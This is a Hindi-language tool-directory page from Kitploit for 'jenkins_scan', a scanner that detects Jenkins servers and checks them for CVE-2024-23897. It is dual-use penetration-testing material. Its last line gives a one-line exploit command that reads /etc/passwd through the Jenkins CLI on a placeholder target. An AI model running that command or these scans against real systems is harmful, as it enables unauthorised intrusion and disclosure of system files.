Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
jenkins_scan — जेन्किन्स वातावरण खोजें और CVE-2024-23897 के लिए जाँच करें | Kitploit
उपकरण/GitHubGitHub/w41l3r/jenkins_scan
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubw41l3r/jenkins_scan

jenkins_scan

जेन्किन्स वातावरण खोजें और CVE-2024-23897 के लिए जाँच करें

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

jenkins_scan

जेनकिंस वातावरण खोजें और CVE-2024-23897 की जाँच करें

यह कैसे काम करता है

जेनकिंस का पता लगाना

पथों का परीक्षण: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json

इसके माध्यम से पहचानता है:

  1. Header X-Jenkins — अधिक विश्वसनीय, संस्करण भी लौटाता है
  2. Header X-Hudson — पुराने उदाहरण
  3. Body HTML — स्ट्रिंग्स जैसे "login to jenkins", "hudson.model", आदि।
  4. /api/json — JSON संरचना (_class, jobs, views) से पुष्टि करता है

CVE-2024-23897 की जाँच

निष्क्रिय (डिफ़ॉल्ट): पता लगाए गए संस्करण की thresholds से तुलना करता है:

  • Weekly: < 2.442 → असुरक्षित
  • LTS: < 2.426.3 → असुरक्षित

सक्रिय (--active): HTTP पर Jenkins CLI के बाइनरी प्रोटोकॉल का हैंडशेक भेजता है। यदि सर्वर 200 + Content-Type: application/octet-stream के साथ प्रतिक्रिया करता है, तो यह पुष्टि करता है कि CLI चैनल खुला है और exploit लागू है।

उपयोग

बुनियादी स्कैन

python jenkins_scan.py -f urls.txt

सक्रिय प्रोब + Burp प्रॉक्सी के रूप में + फ़ाइल में आउटपुट

python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt

20 थ्रेड, वर्बोज़, बिना रंग (pipe/grep के लिए)

python jenkins_scan.py -f urls.txt -t 20 -v --no-color

असुरक्षित लक्ष्य पर मैन्युअल रूप से exploit की पुष्टि करें

java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"

टूल डाउनलोड करें